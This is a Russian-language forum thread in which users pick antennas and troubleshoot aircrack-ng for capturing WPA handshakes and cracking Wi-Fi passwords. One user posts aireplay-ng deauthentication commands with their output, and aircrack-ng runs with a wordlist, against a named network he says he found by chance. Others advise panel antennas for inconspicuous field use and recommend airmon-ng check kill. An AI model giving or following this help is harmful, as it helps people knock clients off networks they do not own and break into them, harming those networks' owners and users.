Подойдут аппараты от Ubiquity например Bullet M2 (придется шить под OpenWRT). Но utp кабель ограничен по затуханию сигнала 100 метрами. Можете как альтернативу рассмотреть активный usb кабель, но длинна конечно тоже не на 300 м.
Добрый день. Как вы считаете какая антенна подойдёт для перехвата WiFi поролей, хендшейка и много другого интересного связанного с взломами с инетом. Есть какая-то разница между антеннами направленными и панельными?
Еще можно присмотреться к TP-Link WA5210G и TP-Link WA7510N, их кстати можно перепрошить в Ubiquit. Вот только питание по витой паре на 200-300 метров тоже проблемно, так как напряжение упадет ниже плинтуса, нужно тянуть витую пару а коробку power of ethernet ставить уже перед самой крышей(точкой доступа).
Панельная антенна, это одна из разновидностей направленных антенн. Антенну можно сделать просто и легко, главное постараться, ну если руки совсем не пригодны для напильника, то можно и купить антенну. Панельки для нашего дела отлично подходят.
Добрый вечер. А в чем вообще отличие антен? Как подобрать? Все таки наверно вы правы без антены ни как не поймать хендшейк : Вот подтверждение
Так есть всё-таки решение проблемы с mon-интерфейсом в новом Aircrack-ng или нет? На сайте Kali Linux нашёл только: https://forums.kali.org/showthread.php?25390-Installing-Aircrack-ng-1-2-rc2 с этим обновлением поотваливались всё программы
Антенны как автомобили, есть гоночные, есть грузовые, есть бизнесс-класс, есть для широких масс. Так и антенну нужно выбирать под задачу, нужен линк на 10-20 км, то это параболическое зеркало с двух сторон и точная настройка антенн друг на друга, нужен хак - панелька или незаметный патч, разведка местности - всенаправленный штырь. Для пробы можно попытаться сделать cantennu из нескафе или там тущенки какой... А так патчи для работы: на выезде - небольшой не привлекающий внимания патчик, для работы из дома дуал патч или квад патч.
Все верно. Сегодня антену не купил не было времени. Пытаюсь с чем пока есть: случайно нашел Code: CH 9 ][ Elapsed: 7 mins ][ 2015-05-13 22:30 ][ fixed channel mon0: 10 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F8:C0:91:14:07:03 -45 97 3779 537 0 9 54e WPA CCMP PSK akado751 BSSID STATION PWR Rate Lost Frames Probe F8:C0:91:14:07:03 C8:F7:33:50:5D:20 -64 0 - 6e 0 586 Проблема следующая все время фиксирует 10 канал, почему ifconfig wlan0 down не помогает, включаю, а через 10 сек снова появляется. Хотя отключить вроде получилось: Code: root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one 22:26:01 Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel 10 22:26:01 mon0 is on channel 10, but the AP uses channel 9 root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one 22:33:41 Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel -1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 22:33:41 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:42 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:42 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:43 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:44 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:44 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:45 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:45 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:46 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] 22:33:46 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03] Хотя не уверен.
Ну, например, все скрипты для перехвата handshake нужно теперь переписывать т.к интерфейса mon0 больше нету. Тот же feedingbottle/inflator с закрытыми исходниками, отвалились. Как тут кто-то сказал, это теперь такая "фича"
Инфлятором не пользовался, а на счет скриптов передавал всегда как параметр интерфейс wlanX... А там уже как параметр можно использовать monX На всякий случай не буду торопиться с обновлением аиркряка, или оно с обновлением кали прилетает?
Также проверял, вроде получилось там один раз перехватать, как написанов в статье на этом сайте провераю на наличие хендшейков: Code: root@kali-Linux:~# aircrack-ng /root/h12.pcap Opening /root/h12.pcap Read 3 packets. # BSSID ESSID Encryption 1 F8:C0:91:14:07:03 akado751 WPA (0 handshake) Choosing first network as target. Opening /root/h12.pcap Please specify a dictionary (option -w). Quitting aircrack-ng... Фиг тебе пишет что нету как так там есть ключи 1-4 и 3-4 почему так
Точно не подскажу, у меня Debian. Но на их форуме рекомендуют пока оставаться на старой версии. Я тоже оставлю 1.2 rc1 пока не будет найдено решение для rc2.
У тебя похоже NetworkManager не остановлен и он управляет сетью, попробуй в его настройках снять галку управлять сетью или дай команду: airmon-ng check kill
Да исправил, но вот теперь что то перехватывается, пакеты ключаей 1-4 и 3-4 когда провераю есть ли там хендшейк: Code: root@kali-Linux:~# aircrack-ng /root/h12.pcap -w /root/wordlist.txt Opening /root/h12.pcap Read 6 packets. # BSSID ESSID Encryption 1 F8:C0:91:14:07:03 akado751 WPA (0 handshake) Choosing first network as target. Opening /root/h12.pcap No valid WPA handshakes found.. Quitting aircrack-ng... то ни как ни чего не получается
Если будут проблемы с поиском чертежей или с изготовлением, сообщи я с разрешения модераторов выложу.
Это все же не то решение, Вы предлагаете мне поставить программы airodump-ng и т.п. на память роутера и с помощью удаленки заходить на него. Но мне нужно решение, чтобы такое устройство, при подключении к компьютеру определялось в kali непосредственно как wlan.